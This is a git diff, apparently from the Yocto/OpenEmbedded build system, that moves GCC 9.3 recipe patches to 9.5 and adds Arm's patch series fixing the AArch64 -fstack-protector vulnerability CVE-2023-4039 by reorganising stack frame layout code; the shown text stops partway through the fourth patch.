diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch b/meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
index 6f0833ccda..6f0833ccda 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch b/meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
index 96da013bf2..96da013bf2 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch b/meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch
index 2385099c25..2385099c25 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch b/meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch
index e0129d1f96..e0129d1f96 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch b/meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
index 1d2182140f..1d2182140f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch b/meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
index e363c7d445..e363c7d445 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch b/meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
index 846c0de5e8..846c0de5e8 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch b/meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch
index 102d6fc742..102d6fc742 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch b/meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
index 443e0a2ca6..443e0a2ca6 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch b/meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch
index 59ac97eaed..59ac97eaed 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch b/meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
index abfa7516da..abfa7516da 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch b/meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
index ae8acc7f13..ae8acc7f13 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch b/meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
index 52a5d97aef..52a5d97aef 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch b/meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
index bfa7e19dd0..bfa7e19dd0 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch b/meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch
index f8e8c07f62..f8e8c07f62 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch b/meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
index 60a29fc94d..60a29fc94d 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch b/meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
index 6f048dab82..6f048dab82 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch b/meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch
index f080b0596f..f080b0596f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch b/meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
index 3b7ccb3e3d..3b7ccb3e3d 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0034-fix-segmentation-fault-in-precompiled-header-generat.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch b/meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch
index 5e199fbcfd..5e199fbcfd 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0035-Fix-for-testsuite-failure.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0035-Fix-for-testsuite-failure.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch b/meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch
index 825e070aa3..825e070aa3 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0036-Re-introduce-spe-commandline-options.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0036-Re-introduce-spe-commandline-options.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch b/meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
index f268a4eb58..f268a4eb58 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch b/meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
index a79fc03d15..a79fc03d15 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch b/meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
index b69114d1e5..b69114d1e5 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch b/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch
new file mode 100644
index 0000000000..56d229066f
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc-9.5/CVE-2023-4039.patch
@@ -0,0 +1,1506 @@
+From: Richard Sandiford <richard.sandiford@arm.com>
+Subject: [PATCH 00/19] aarch64: Fix -fstack-protector issue
+Date: Tue, 12 Sep 2023 16:25:10 +0100
+
+This series of patches fixes deficiencies in GCC's -fstack-protector
+implementation for AArch64 when using dynamically allocated stack space.
+This is CVE-2023-4039.  See:
+
+https://developer.arm.com/Arm%20Security%20Center/GCC%20Stack%20Protector%20Vulnerability%20AArch64
+https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x7ch-h5rf-w2mf
+
+for more details.
+
+The fix is to put the saved registers above the locals area when
+-fstack-protector is used.
+
+The series also fixes a stack-clash problem that I found while working
+on the CVE.  In unpatched sources, the stack-clash problem would only
+trigger for unrealistic numbers of arguments (8K 64-bit arguments, or an
+equivalent).  But it would be a more significant issue with the new
+-fstack-protector frame layout.  It's therefore important that both
+problems are fixed together.
+
+Some reorganisation of the code seemed necessary to fix the problems in a
+cleanish way.  The series is therefore quite long, but only a handful of
+patches should have any effect on code generation.
+
+See the individual patches for a detailed description.
+
+Tested on aarch64-linux-gnu. Pushed to trunk and to all active branches.
+I've also pushed backports to GCC 7+ to vendors/ARM/heads/CVE-2023-4039.
+
+CVE: CVE-2023-4039
+Upstream-Status: Submitted
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+  
+  
+From 78ebdb7b12d5e258b9811bab715734454268fd0c Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Fri, 16 Jun 2023 17:00:51 +0100
+Subject: [PATCH 01/10] aarch64: Explicitly handle frames with no saved
+ registers
+
+If a frame has no saved registers, it can be allocated in one go.
+There is no need to treat the areas below and above the saved
+registers as separate.
+
+And if we allocate the frame in one go, it should be allocated
+as the initial_adjust rather than the final_adjust.  This allows the
+frame size to grow to guard_size - guard_used_by_caller before a stack
+probe is needed.  (A frame with no register saves is necessarily a
+leaf frame.)
+
+This is a no-op as thing stand, since a leaf function will have
+no outgoing arguments, and so all the frame will be above where
+the saved registers normally go.
+
+gcc/
+	* config/aarch64/aarch64.c (aarch64_layout_frame): Explicitly
+	allocate the frame in one go if there are no saved registers.
+---
+ gcc/config/aarch64/aarch64.c | 8 +++++---
+ 1 file changed, 5 insertions(+), 3 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index a35dceab9fc..e9dad682738 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4771,9 +4771,11 @@ aarch64_layout_frame (void)
+     max_push_offset = 256;
+ 
+   HOST_WIDE_INT const_size, const_fp_offset;
+-  if (cfun->machine->frame.frame_size.is_constant (&const_size)
+-      && const_size < max_push_offset
+-      && known_eq (crtl->outgoing_args_size, 0))
++  if (cfun->machine->frame.saved_regs_size == 0)
++    cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
++  else if (cfun->machine->frame.frame_size.is_constant (&const_size)
++	   && const_size < max_push_offset
++	   && known_eq (crtl->outgoing_args_size, 0))
+     {
+       /* Simple, small frame with no outgoing arguments:
+ 	 stp reg1, reg2, [sp, -frame_size]!
+-- 
+2.34.1
+
+
+From 347487fffa0266d43bf18f1f91878410881f596e Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Fri, 16 Jun 2023 16:55:12 +0100
+Subject: [PATCH 02/10] aarch64: Add bytes_below_hard_fp to frame info
+
+The frame layout code currently hard-codes the assumption that
+the number of bytes below the saved registers is equal to the
+size of the outgoing arguments.  This patch abstracts that
+value into a new field of aarch64_frame.
+
+gcc/
+	* config/aarch64/aarch64.h (aarch64_frame::bytes_below_hard_fp): New
+	field.
+	* config/aarch64/aarch64.c (aarch64_layout_frame): Initialize it,
+	and use it instead of crtl->outgoing_args_size.
+	(aarch64_get_separate_components): Use bytes_below_hard_fp instead
+	of outgoing_args_size.
+	(aarch64_process_components): Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 50 +++++++++++++++++++-----------------
+ gcc/config/aarch64/aarch64.h |  6 ++++-
+ 2 files changed, 32 insertions(+), 24 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index e9dad682738..25cf10cc4b9 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4684,6 +4684,8 @@ aarch64_layout_frame (void)
+ 	last_fp_reg = regno;
+       }
+ 
++  cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
++
+   if (cfun->machine->frame.emit_frame_chain)
+     {
+       /* FP and LR are placed in the linkage record.  */
+@@ -4751,11 +4753,11 @@ aarch64_layout_frame (void)
+ 			   STACK_BOUNDARY / BITS_PER_UNIT);
+ 
+   /* Both these values are already aligned.  */
+-  gcc_assert (multiple_p (crtl->outgoing_args_size,
++  gcc_assert (multiple_p (cfun->machine->frame.bytes_below_hard_fp,
+ 			  STACK_BOUNDARY / BITS_PER_UNIT));
+   cfun->machine->frame.frame_size
+     = (cfun->machine->frame.hard_fp_offset
+-       + crtl->outgoing_args_size);
++       + cfun->machine->frame.bytes_below_hard_fp);
+ 
+   cfun->machine->frame.locals_offset = cfun->machine->frame.saved_varargs_size;
+ 
+@@ -4775,23 +4777,23 @@ aarch64_layout_frame (void)
+     cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
+   else if (cfun->machine->frame.frame_size.is_constant (&const_size)
+ 	   && const_size < max_push_offset
+-	   && known_eq (crtl->outgoing_args_size, 0))
++	   && known_eq (cfun->machine->frame.bytes_below_hard_fp, 0))
+     {
+-      /* Simple, small frame with no outgoing arguments:
++      /* Simple, small frame with no data below the saved registers.
+ 	 stp reg1, reg2, [sp, -frame_size]!
+ 	 stp reg3, reg4, [sp, 16]  */
+       cfun->machine->frame.callee_adjust = const_size;
+     }
+-  else if (known_lt (crtl->outgoing_args_size
++  else if (known_lt (cfun->machine->frame.bytes_below_hard_fp
+ 		     + cfun->machine->frame.saved_regs_size, 512)
+ 	   && !(cfun->calls_alloca
+ 		&& known_lt (cfun->machine->frame.hard_fp_offset,
+ 			     max_push_offset)))
+     {
+-      /* Frame with small outgoing arguments:
++      /* Frame with small area below the saved registers:
+ 	 sub sp, sp, frame_size
+-	 stp reg1, reg2, [sp, outgoing_args_size]
+-	 stp reg3, reg4, [sp, outgoing_args_size + 16]  */
++	 stp reg1, reg2, [sp, bytes_below_hard_fp]
++	 stp reg3, reg4, [sp, bytes_below_hard_fp + 16]  */
+       cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
+       cfun->machine->frame.callee_offset
+ 	= cfun->machine->frame.frame_size - cfun->machine->frame.hard_fp_offset;
+@@ -4799,22 +4801,23 @@ aarch64_layout_frame (void)
+   else if (cfun->machine->frame.hard_fp_offset.is_constant (&const_fp_offset)
+ 	   && const_fp_offset < max_push_offset)
+     {
+-      /* Frame with large outgoing arguments but a small local area:
++      /* Frame with large area below the saved registers, but with a
++	 small area above:
+ 	 stp reg1, reg2, [sp, -hard_fp_offset]!
+ 	 stp reg3, reg4, [sp, 16]
+-	 sub sp, sp, outgoing_args_size  */
++	 sub sp, sp, bytes_below_hard_fp  */
+       cfun->machine->frame.callee_adjust = const_fp_offset;
+       cfun->machine->frame.final_adjust
+ 	= cfun->machine->frame.frame_size - cfun->machine->frame.callee_adjust;
+     }
+   else
+     {
+-      /* Frame with large local area and outgoing arguments using frame pointer:
++      /* General case:
+ 	 sub sp, sp, hard_fp_offset
+ 	 stp x29, x30, [sp, 0]
+ 	 add x29, sp, 0
+ 	 stp reg3, reg4, [sp, 16]
+-	 sub sp, sp, outgoing_args_size  */
++	 sub sp, sp, bytes_below_hard_fp  */
+       cfun->machine->frame.initial_adjust = cfun->machine->frame.hard_fp_offset;
+       cfun->machine->frame.final_adjust
+ 	= cfun->machine->frame.frame_size - cfun->machine->frame.initial_adjust;
+@@ -5243,9 +5246,11 @@ aarch64_get_separate_components (void)
+     if (aarch64_register_saved_on_entry (regno))
+       {
+ 	poly_int64 offset = cfun->machine->frame.reg_offset[regno];
++
++	/* Get the offset relative to the register we'll use.  */
+ 	if (!frame_pointer_needed)
+-	  offset += cfun->machine->frame.frame_size
+-		    - cfun->machine->frame.hard_fp_offset;
++	  offset += cfun->machine->frame.bytes_below_hard_fp;
++
+ 	/* Check that we can access the stack slot of the register with one
+ 	   direct load with no adjustments needed.  */
+ 	if (offset_12bit_unsigned_scaled_p (DImode, offset))
+@@ -5367,8 +5372,8 @@ aarch64_process_components (sbitmap components, bool prologue_p)
+       rtx reg = gen_rtx_REG (mode, regno);
+       poly_int64 offset = cfun->machine->frame.reg_offset[regno];
+       if (!frame_pointer_needed)
+-	offset += cfun->machine->frame.frame_size
+-		  - cfun->machine->frame.hard_fp_offset;
++	offset += cfun->machine->frame.bytes_below_hard_fp;
++
+       rtx addr = plus_constant (Pmode, ptr_reg, offset);
+       rtx mem = gen_frame_mem (mode, addr);
+ 
+@@ -5410,8 +5415,7 @@ aarch64_process_components (sbitmap components, bool prologue_p)
+       /* REGNO2 can be saved/restored in a pair with REGNO.  */
+       rtx reg2 = gen_rtx_REG (mode, regno2);
+       if (!frame_pointer_needed)
+-	offset2 += cfun->machine->frame.frame_size
+-		  - cfun->machine->frame.hard_fp_offset;
++	offset2 += cfun->machine->frame.bytes_below_hard_fp;
+       rtx addr2 = plus_constant (Pmode, ptr_reg, offset2);
+       rtx mem2 = gen_frame_mem (mode, addr2);
+       rtx set2 = prologue_p ? gen_rtx_SET (mem2, reg2)
+@@ -5478,10 +5482,10 @@ aarch64_stack_clash_protection_alloca_probe_range (void)
+    registers.  If POLY_SIZE is not large enough to require a probe this function
+    will only adjust the stack.  When allocating the stack space
+    FRAME_RELATED_P is then used to indicate if the allocation is frame related.
+-   FINAL_ADJUSTMENT_P indicates whether we are allocating the outgoing
+-   arguments.  If we are then we ensure that any allocation larger than the ABI
+-   defined buffer needs a probe so that the invariant of having a 1KB buffer is
+-   maintained.
++   FINAL_ADJUSTMENT_P indicates whether we are allocating the area below
++   the saved registers.  If we are then we ensure that any allocation
++   larger than the ABI defined buffer needs a probe so that the
++   invariant of having a 1KB buffer is maintained.
+ 
+    We emit barriers after each stack adjustment to prevent optimizations from
+    breaking the invariant that we never drop the stack more than a page.  This
+@@ -5671,7 +5675,7 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+   /* Handle any residuals.  Residuals of at least MIN_PROBE_THRESHOLD have to
+      be probed.  This maintains the requirement that each page is probed at
+      least once.  For initial probing we probe only if the allocation is
+-     more than GUARD_SIZE - buffer, and for the outgoing arguments we probe
++     more than GUARD_SIZE - buffer, and below the saved registers we probe
+      if the amount is larger than buffer.  GUARD_SIZE - buffer + buffer ==
+      GUARD_SIZE.  This works that for any allocation that is large enough to
+      trigger a probe here, we'll have at least one, and if they're not large
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index af0bc3f1881..95831637ba7 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -712,9 +712,13 @@ struct GTY (()) aarch64_frame
+   HOST_WIDE_INT saved_varargs_size;
+ 
+   /* The size of the saved callee-save int/FP registers.  */
+-
+   HOST_WIDE_INT saved_regs_size;
+ 
++  /* The number of bytes between the bottom of the static frame (the bottom
++     of the outgoing arguments) and the hard frame pointer.  This value is
++     always a multiple of STACK_BOUNDARY.  */
++  poly_int64 bytes_below_hard_fp;
++
+   /* Offset from the base of the frame (incomming SP) to the
+      top of the locals area.  This value is always a multiple of
+      STACK_BOUNDARY.  */
+-- 
+2.34.1
+
+
+From 4604c4cd0a6c4c26d6594ec9a0383b4d9197d9df Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 11:25:40 +0100
+Subject: [PATCH 03/10] aarch64: Rename locals_offset to bytes_above_locals
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+locals_offset was described as:
+
+  /* Offset from the base of the frame (incomming SP) to the
+     top of the locals area.  This value is always a multiple of
+     STACK_BOUNDARY.  */
+
+This is implicitly an “upside down� view of the frame: the incoming
+SP is at offset 0, and anything N bytes below the incoming SP is at
+offset N (rather than -N).
+
+However, reg_offset instead uses a “right way up� view; that is,
+it views offsets in address terms.  Something above X is at a
+positive offset from X and something below X is at a negative
+offset from X.
+
+Also, even on FRAME_GROWS_DOWNWARD targets like AArch64,
+target-independent code views offsets in address terms too:
+locals are allocated at negative offsets to virtual_stack_vars.
+
+It seems confusing to have *_offset fields of the same structure
+using different polarities like this.  This patch tries to avoid
+that by renaming locals_offset to bytes_above_locals.
+
+gcc/
+	* config/aarch64/aarch64.h (aarch64_frame::locals_offset): Rename to...
+	(aarch64_frame::bytes_above_locals): ...this.
+	* config/aarch64/aarch64.c (aarch64_layout_frame)
+	(aarch64_initial_elimination_offset): Update accordingly.
+---
+ gcc/config/aarch64/aarch64.c | 9 +++++----
+ gcc/config/aarch64/aarch64.h | 6 +++---
+ 2 files changed, 8 insertions(+), 7 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 25cf10cc4b9..dcaf491af42 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4759,7 +4759,8 @@ aarch64_layout_frame (void)
+     = (cfun->machine->frame.hard_fp_offset
+        + cfun->machine->frame.bytes_below_hard_fp);
+ 
+-  cfun->machine->frame.locals_offset = cfun->machine->frame.saved_varargs_size;
++  cfun->machine->frame.bytes_above_locals
++    = cfun->machine->frame.saved_varargs_size;
+ 
+   cfun->machine->frame.initial_adjust = 0;
+   cfun->machine->frame.final_adjust = 0;
+@@ -8566,14 +8567,14 @@ aarch64_initial_elimination_offset (unsigned from, unsigned to)
+ 
+       if (from == FRAME_POINTER_REGNUM)
+ 	return cfun->machine->frame.hard_fp_offset
+-	       - cfun->machine->frame.locals_offset;
++	       - cfun->machine->frame.bytes_above_locals;
+     }
+ 
+   if (to == STACK_POINTER_REGNUM)
+     {
+       if (from == FRAME_POINTER_REGNUM)
+-	  return cfun->machine->frame.frame_size
+-		 - cfun->machine->frame.locals_offset;
++	return cfun->machine->frame.frame_size
++	       - cfun->machine->frame.bytes_above_locals;
+     }
+ 
+   return cfun->machine->frame.frame_size;
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index 95831637ba7..a079a88b4f4 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -719,10 +719,10 @@ struct GTY (()) aarch64_frame
+      always a multiple of STACK_BOUNDARY.  */
+   poly_int64 bytes_below_hard_fp;
+ 
+-  /* Offset from the base of the frame (incomming SP) to the
+-     top of the locals area.  This value is always a multiple of
++  /* The number of bytes between the top of the locals area and the top
++     of the frame (the incomming SP).  This value is always a multiple of
+      STACK_BOUNDARY.  */
+-  poly_int64 locals_offset;
++  poly_int64 bytes_above_locals;
+ 
+   /* Offset from the base of the frame (incomming SP) to the
+      hard_frame_pointer.  This value is always a multiple of
+-- 
+2.34.1
+
+
+From 16016465ff28a75f5e0540cbaeb4eb102fdc3230 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 11:28:11 +0100
+Subject: [PATCH 04/10] aarch64: Rename hard_fp_offset to bytes_above_hard_fp
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Similarly to the previous locals_offset patch, hard_fp_offset
+was described as:
+
+  /* Offset from the base of the frame (incomming SP) to the
+     hard_frame_pointer.  This value is always a multiple of
+     STACK_BOUNDARY.  */
+  poly_int64 hard_fp_offset;
+
+which again took an “upside-down� view: higher offsets meant lower
+addresses.  This patch renames the field to bytes_above_hard_fp instead.
+
+gcc/
+	* config/aarch64/aarch64.h (aarch64_frame::hard_fp_offset): Rename
+	to...
+	(aarch64_frame::bytes_above_hard_fp): ...this.
+	* config/aarch64/aarch64.c (aarch64_layout_frame)
+	(aarch64_expand_prologue): Update accordingly.
+	(aarch64_initial_elimination_offset): Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 21 +++++++++++----------
+ gcc/config/aarch64/aarch64.h |  6 +++---
+ 2 files changed, 14 insertions(+), 13 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index dcaf491af42..2681e0c2bb9 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4747,7 +4747,7 @@ aarch64_layout_frame (void)
+   HOST_WIDE_INT varargs_and_saved_regs_size
+     = offset + cfun->machine->frame.saved_varargs_size;
+ 
+-  cfun->machine->frame.hard_fp_offset
++  cfun->machine->frame.bytes_above_hard_fp
+     = aligned_upper_bound (varargs_and_saved_regs_size
+ 			   + get_frame_size (),
+ 			   STACK_BOUNDARY / BITS_PER_UNIT);
+@@ -4756,7 +4756,7 @@ aarch64_layout_frame (void)
+   gcc_assert (multiple_p (cfun->machine->frame.bytes_below_hard_fp,
+ 			  STACK_BOUNDARY / BITS_PER_UNIT));
+   cfun->machine->frame.frame_size
+-    = (cfun->machine->frame.hard_fp_offset
++    = (cfun->machine->frame.bytes_above_hard_fp
+        + cfun->machine->frame.bytes_below_hard_fp);
+ 
+   cfun->machine->frame.bytes_above_locals
+@@ -4788,7 +4788,7 @@ aarch64_layout_frame (void)
+   else if (known_lt (cfun->machine->frame.bytes_below_hard_fp
